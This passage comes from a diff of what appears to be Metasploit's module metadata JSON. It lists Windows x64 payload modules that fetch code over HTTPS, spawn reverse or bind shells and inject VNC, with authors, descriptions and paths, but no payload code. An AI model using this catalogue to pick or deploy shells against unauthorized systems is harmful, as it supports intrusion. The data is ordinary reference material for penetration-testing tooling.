"/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/https/x64/shell/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/shell/bind_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/shell/bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/shell/bind_tcp_rc4": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/shell/bind_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/shell/reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/shell/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/shell/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/https/x64/shell_bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/https/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/shell_reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/https/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/vncinject/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/vncinject/bind_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/vncinject/bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/vncinject/bind_tcp_rc4": { - "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/vncinject/bind_tcp_uuid": { - "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_http": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_https": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_winhttp": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/https/x64/vncinject/reverse_winhttps": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/jjs_reverse_tcp": { - "name": "Windows Shell, Reverse TCP (via jjs)", - "fullname": "payload/cmd/windows/jjs_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "conerpirate", - "bcoles " - ], - "description": "Connect back and create a command shell via jjs", - "references": [ - "URL-https://gtfobins.github.io/gtfobins/jjs/", - "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", 